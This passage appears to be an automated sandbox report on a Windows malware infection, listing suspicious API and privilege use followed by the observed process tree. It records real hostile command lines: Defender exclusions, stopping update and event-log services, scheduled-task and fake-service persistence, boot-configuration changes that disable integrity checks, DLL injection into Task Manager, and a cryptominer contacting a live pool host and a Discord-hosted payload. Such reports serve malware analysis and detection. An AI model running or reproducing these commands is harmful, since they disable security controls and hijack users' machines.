| N/A | N/A | C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vgtejgi | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\RuIUvkS8wVfymaAK7lF9BY8u.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\powercfg.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-G37C5.tmp\DUxkNmj5MiGf8BNoRKpbAk7D.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-5PL38.tmp\wz8VvURJ6HobiJci3zt7FzSf.tmp | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe
"C:\Users\Admin\Pictures\Hz5DKFVHt5wmDrYd00peGwos.exe"
C:\Users\Admin\Pictures\DUxkNmj5MiGf8BNoRKpbAk7D.exe
"C:\Users\Admin\Pictures\DUxkNmj5MiGf8BNoRKpbAk7D.exe"
C:\Users\Admin\AppData\Local\Temp\is-G37C5.tmp\DUxkNmj5MiGf8BNoRKpbAk7D.tmp
"C:\Users\Admin\AppData\Local\Temp\is-G37C5.tmp\DUxkNmj5MiGf8BNoRKpbAk7D.tmp" /SL5="$5015A,1697450,56832,C:\Users\Admin\Pictures\DUxkNmj5MiGf8BNoRKpbAk7D.exe"
C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe
"C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240310162609.log C:\Windows\Logs\CBS\CbsPersist_20240310162609.cab
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i
C:\Users\Admin\Pictures\ua7PBRa40qlB8cRQTFxvJuWK.exe
"C:\Users\Admin\Pictures\ua7PBRa40qlB8cRQTFxvJuWK.exe"
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s
C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe
"C:\Users\Admin\Pictures\BHyvkIgo1eAG39KMFmpK1JKB.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\D5A7.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\FE0F.exe
C:\Users\Admin\AppData\Local\Temp\FE0F.exe
C:\Users\Admin\AppData\Local\Temp\FE0F.exe
C:\Users\Admin\AppData\Local\Temp\FE0F.exe
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\f55404de-f96d-40e3-8f6a-c259dbe6d608" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\FE0F.exe
"C:\Users\Admin\AppData\Local\Temp\FE0F.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\FE0F.exe
"C:\Users\Admin\AppData\Local\Temp\FE0F.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe
"C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe"
C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe
"C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build2.exe"
C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build3.exe
"C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build3.exe"
C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build3.exe
"C:\Users\Admin\AppData\Local\3b3cc6b9-35e4-49ed-98f9-9617d74d1e31\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1032 -s 1420
C:\Users\Admin\Pictures\PHZUeKsym6c4ao1N4lAzfMjT.exe
"C:\Users\Admin\Pictures\PHZUeKsym6c4ao1N4lAzfMjT.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {029FDEDE-A8B2-4C27-9383-0DACEBD61D66} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\AppData\Local\Temp\8D34.exe
C:\Users\Admin\AppData\Local\Temp\8D34.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2252 -s 124
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\EBF7.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Local\Temp\2437.exe
C:\Users\Admin\AppData\Local\Temp\2437.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\vgtejgi
C:\Users\Admin\AppData\Roaming\vgtejgi
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\Pictures\GHuvLZsqsmCMoGgf6n6VLvxo.exe
"C:\Users\Admin\Pictures\GHuvLZsqsmCMoGgf6n6VLvxo.exe"
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
C:\Users\Admin\Pictures\RuIUvkS8wVfymaAK7lF9BY8u.exe
"C:\Users\Admin\Pictures\RuIUvkS8wVfymaAK7lF9BY8u.exe"
C:\Users\Admin\Pictures\wz8VvURJ6HobiJci3zt7FzSf.exe
"C:\Users\Admin\Pictures\wz8VvURJ6HobiJci3zt7FzSf.exe"
C:\Users\Admin\AppData\Local\Temp\is-5PL38.tmp\wz8VvURJ6HobiJci3zt7FzSf.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5PL38.tmp\wz8VvURJ6HobiJci3zt7FzSf.tmp" /SL5="$60178,1697450,56832,C:\Users\Admin\Pictures\wz8VvURJ6HobiJci3zt7FzSf.exe"
C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe
"C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\43BA.exe
C:\Users\Admin\AppData\Local\Temp\43BA.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe
"C:\Users\Admin\Pictures\FusMm6h3ZIYvS3H6ML4oKi29.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Users\Admin\Pictures\ZKgWpaIq4ixsfKfSjBJZNp2s.exe
"C:\Users\Admin\Pictures\ZKgWpaIq4ixsfKfSjBJZNp2s.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x548
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=ahrievohz2aiv7Ee -m=https://cdn.discordapp.com/attachments/1210289102486904905/1211762574903877723/FyjjCEEagid?ex=65ef60d7&is=65dcebd7&hm=7d9a74bd2093b634718d663ba89134d88a58fd63129fa37453f5146146e9fc4c& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe
C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe -o showlock.net:40001 --rig-id 234c6d18-3256-488e-b465-c4f656ececdc --tls --nicehash -o showlock.net:443 --rig-id 234c6d18-3256-488e-b465-c4f656ececdc --tls --nicehash -o showlock.net:80 --rig-id 234c6d18-3256-488e-b465-c4f656ececdc --nicehash --http-port 3433 --http-access-token 234c6d18-3256-488e-b465-c4f656ececdc --randomx-wrmsr=-1
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe -hide 1960
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -i
C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe
"C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe" -s
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\Pictures\MWZ0UpCReh4UDpqFe8lrwVHo.exe
"C:\Users\Admin\Pictures\MWZ0UpCReh4UDpqFe8lrwVHo.exe"
C:\Users\Admin\AppData\Local\Temp\is-6RKA3.tmp\MWZ0UpCReh4UDpqFe8lrwVHo.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6RKA3.tmp\MWZ0UpCReh4UDpqFe8lrwVHo.tmp" /SL5="$60210,1697450,56832,C:\Users\Admin\Pictures\MWZ0UpCReh4UDpqFe8lrwVHo.exe"
C:\Users\Admin\Pictures\Jp275Dhuhpnf32gtIbZFsj8s.exe
"C:\Users\Admin\Pictures\Jp275Dhuhpnf32gtIbZFsj8s.exe"
C:\Users\Admin\Pictures\fO1T1qPAwM5rbuoMSDKChoT7.exe
"C:\Users\Admin\Pictures\fO1T1qPAwM5rbuoMSDKChoT7.exe"
C:\Users\Admin\Pictures\UKHOJolg3CXlziMu5ibYYblw.exe
